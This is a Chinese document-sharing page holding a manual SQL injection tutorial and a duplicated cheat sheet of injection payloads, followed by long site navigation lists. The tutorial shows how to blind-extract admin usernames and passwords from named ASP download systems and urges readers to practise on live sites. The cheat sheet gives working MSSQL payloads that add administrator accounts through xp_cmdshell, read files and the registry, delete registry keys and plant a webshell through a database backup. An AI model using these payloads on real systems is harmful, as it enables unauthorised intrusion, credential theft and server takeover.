手动注入检测
入侵过程主要包括以下几个步骤: 1、测试ASP系统是否有注入漏洞; 2、获取数据库表名; 3、测试管理员ID; 4、测试管理员用户名长度和管理员密码长度; 5、从高到低依次测试出管理员用户名和密码。 测试ASP系统是否有注入漏洞 这很关键,没有漏洞的网站你就别瞎忙了。方法也很简单,打开ASP网站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面分别加入and 1=1 和and 1=2进行测试,具体形式为/list.asp?id=11 and 1=1 (以下各测试语句都用同样的形式加入,TTY将不再说明)注意空格。在IE浏览器里空格将自动转换为%20。如果输入and 1=1 能正常显示原页面内容,输入and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,可以进行下面的步骤。测试数据库表名 一个数据库里一般有很多表,我们要找到存放管理员用户名和密码的表。对于已知类型的ASP系统来说,可以到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就可以了,一般都是admin。无论是否知道表名,都加以下语句测试一下: and 0<>(select count(*) from admin) 如果能返回正常页面,说明表名就是admin,否则继续换表名测试。 测试管理员ID 一般网站的管理员不是很多的,ID也不是很大,依次用1、2、3 ... ... 测试,很快 就能测到,具体测试语句为: and (select count(*) from admin where id=1) 变换最后的数字1进行测试,直到能正常返回原页面为止。 测试管理员用户名长度和管理员密码长度 这很重要,不知道用户名和密码是几位数下面的工作就无法进行。 用户名长度: and (select count(*) from admin where id=5 and len(username)=4) 密码长度: and (select count(*) from admin where id=5 and len(pws)=4) 需要注意的是,表里存放用户名的字段username和存放密码的字段pws需要打开数据库进行确认。 最后测试出管理员用户名和密码 从高到低,依次一位一位的测试,直到测出为止: 正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left(us ername,3)='ttd') 正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='1506411') 好了,如果操作无误的话,你就可以测试出正确的用户名和密码了。马上到网上去找一个盗帅下载系统或逸风网站系统练习吧! 对于新手来说,上面的方法可以看成是学习注入原理,实际操作起来是非常累人的,且不说语句是否正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,如果是数字要测试10次,如果是字母要测试26次,如果哪位老兄用户名和密码都用上了!@#$%的话,那你慢
慢去测试吧,哈哈哈哈哈! ------------------------------------- 手动注入脚本命令精华版 作者:未知 来源:http://wendang.chazidian.com 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 10.测试权限结构(mssql) ;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- ;and 1=(select IS_MEMBER(’db_owner’));-- 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;-- ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree ’c:/’ ;and (select top 1 paths from dirs)>0 ;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>) (2)遍历目录 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar (255));-- ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;--
获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’ SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’ TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’c:/l.asp’; 15.mssql内置函数 ;and (select @@version)>0 获得Windows的版本号 ;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa ;and (select user_name())>0 爆当前系统的连接用户 ;and (select db_name())>0 得到当前连接的数据库 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’; 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 10.测试权限结构(mssql) ;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- ;and 1=(select IS_MEMBER(’db_owner’));- - 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password /workstations:*/times:all/
passwordchg:yes /passwordreq:yes /active:yes /add’;-- ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree ’c:/’ ;and (select top 1 paths from dirs)>0 ;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>) (2)遍历目录 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar (255));-- ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’ SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’ TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’c:/l.asp’; 15.mssql内置函数 ;and (select @@version)>0 获得Windows的版本号 ;and use r_name()=’dbo’ 判断当前系统的连接用户是不是sa ;and (select user_name())>0 爆当前系统的连接用户 ;and (select db_name())>0 得到当前连接的数据库 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’;
下载文档
热门试卷
- 2016年四川省内江市中考化学试卷
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
- 山东省滨州市三校2017届第一学期阶段测试初三英语试题
- 四川省成都七中2017届高三一诊模拟考试文科综合试卷
- 2017届普通高等学校招生全国统一考试模拟试题(附答案)
- 重庆市永川中学高2017级上期12月月考语文试题
- 江西宜春三中2017届高三第一学期第二次月考文科综合试题
- 内蒙古赤峰二中2017届高三上学期第三次月考英语试题
- 2017年六年级(上)数学期末考试卷
- 2017人教版小学英语三年级上期末笔试题
- 江苏省常州西藏民族中学2016-2017学年九年级思想品德第一学期第二次阶段测试试卷
- 重庆市九龙坡区七校2016-2017学年上期八年级素质测查(二)语文学科试题卷
- 江苏省无锡市钱桥中学2016年12月八年级语文阶段性测试卷
- 江苏省无锡市钱桥中学2016-2017学年七年级英语12月阶段检测试卷
- 山东省邹城市第八中学2016-2017学年八年级12月物理第4章试题(无答案)
- 【人教版】河北省2015-2016学年度九年级上期末语文试题卷(附答案)
- 四川省简阳市阳安中学2016年12月高二月考英语试卷
- 四川省成都龙泉中学高三上学期2016年12月月考试题文科综合能力测试
- 安徽省滁州中学2016—2017学年度第一学期12月月考高三英语试卷
- 山东省武城县第二中学2016.12高一年级上学期第二次月考历史试题(必修一第四、五单元)
- 福建省四地六校联考2016-2017学年上学期第三次月考高三化学试卷
- 甘肃省武威第二十三中学2016—2017学年度八年级第一学期12月月考生物试卷
网友关注
- 03-花甲煮艺可行性报告Word
- 企业宣传片拍摄光线的技巧把握Word
- 2014英语(天津卷)精校打印Word版含答案
- 总复习 雨具的改进答案
- 铁路桥梁状态评估方法Word
- 媒体平台比较Word
- 2014英语(新课标I卷)精校打印版 Word版含答案
- 机械效率滑Word
- 第四章 公司法Word
- 2014英语(重庆卷)精校打印版含答案
- 94A文案是怎样练成的Word
- 中经交流(国际业务模块)Word
- 2014英语(新课标II)精校打印版 Word版含答案
- 数据库介绍SAGEWord
- 《邓稼先》Word
- 市场营销第八章定价策略 课件Word
- 江阴德语培训哪里好
- 第一节 稳恒电流Word
- 党积极分子结课课件 梁嘉欣Word
- 丽水德语培训哪里好
- 唐诗
- 现场卫生培训Word
- 教育学之教育与人的发展Word
- 歌颂青春.Word
- mother‘s dayWord
- 第04讲-认识几何非线性Word
- 【中华古籍】国学启蒙经典-家诫要言
- MACD绝密宝典Word
- 浙江省十二校联盟2016学年高三第二学期第二次质检语文试卷答案
- 新课标气体摩尔体积省级公开课课件(原创)Word
网友关注视频
- 二年级下册数学第一课
- 外研版英语七年级下册module1unit3名词性物主代词讲解
- 【部编】人教版语文七年级下册《泊秦淮》优质课教学视频+PPT课件+教案,广东省
- 二年级下册数学第二课
- 沪教版牛津小学英语(深圳用) 五年级下册 Unit 12
- 冀教版小学数学二年级下册第二单元《有余数除法的整理与复习》
- 外研版英语三起5年级下册(14版)Module3 Unit1
- 沪教版牛津小学英语(深圳用) 四年级下册 Unit 12
- 外研版英语七年级下册module3 unit1第二课时
- 冀教版小学数学二年级下册第二单元《有余数除法的竖式计算》
- 19 爱护鸟类_第一课时(二等奖)(桂美版二年级下册)_T502436
- 冀教版英语三年级下册第二课
- 【部编】人教版语文七年级下册《泊秦淮》优质课教学视频+PPT课件+教案,天津市
- 第五单元 民族艺术的瑰宝_15. 多姿多彩的民族服饰_第二课时(市一等奖)(岭南版六年级上册)_T129830
- 北师大版数学 四年级下册 第三单元 第二节 小数点搬家
- 苏科版八年级数学下册7.2《统计图的选用》
- 3.2 数学二年级下册第二单元 表内除法(一)整理和复习 李菲菲
- 沪教版牛津小学英语(深圳用) 四年级下册 Unit 7
- 3月2日小学二年级数学下册(数一数)
- 沪教版牛津小学英语(深圳用) 五年级下册 Unit 10
- 【部编】人教版语文七年级下册《过松源晨炊漆公店(其五)》优质课教学视频+PPT课件+教案,辽宁省
- 外研版八年级英语下学期 Module3
- 人教版历史八年级下册第一课《中华人民共和国成立》
- 沪教版牛津小学英语(深圳用)五年级下册 Unit 1
- 苏教版二年级下册数学《认识东、南、西、北》
- 外研版英语七年级下册module3 unit2第一课时
- 冀教版小学英语四年级下册Lesson2授课视频
- 【部编】人教版语文七年级下册《逢入京使》优质课教学视频+PPT课件+教案,安徽省
- 外研版英语七年级下册module3 unit2第二课时
- 8 随形想象_第一课时(二等奖)(沪教版二年级上册)_T3786594
精品推荐
- 2016-2017学年高一语文人教版必修一+模块学业水平检测试题(含答案)
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
分类导航
- 互联网
- 电脑基础知识
- 计算机软件及应用
- 计算机硬件及网络
- 计算机应用/办公自动化
- .NET
- 数据结构与算法
- Java
- SEO
- C/C++资料
- linux/Unix相关
- 手机开发
- UML理论/建模
- 并行计算/云计算
- 嵌入式开发
- windows相关
- 软件工程
- 管理信息系统
- 开发文档
- 图形图像
- 网络与通信
- 网络信息安全
- 电子支付
- Labview
- matlab
- 网络资源
- Python
- Delphi/Perl
- 评测
- Flash/Flex
- CSS/Script
- 计算机原理
- PHP资料
- 数据挖掘与模式识别
- Web服务
- 数据库
- Visual Basic
- 电子商务
- 服务器
- 搜索引擎优化
- 存储
- 架构
- 行业软件
- 人工智能
- 计算机辅助设计
- 多媒体
- 软件测试
- 计算机硬件与维护
- 网站策划/UE
- 网页设计/UI
- 网吧管理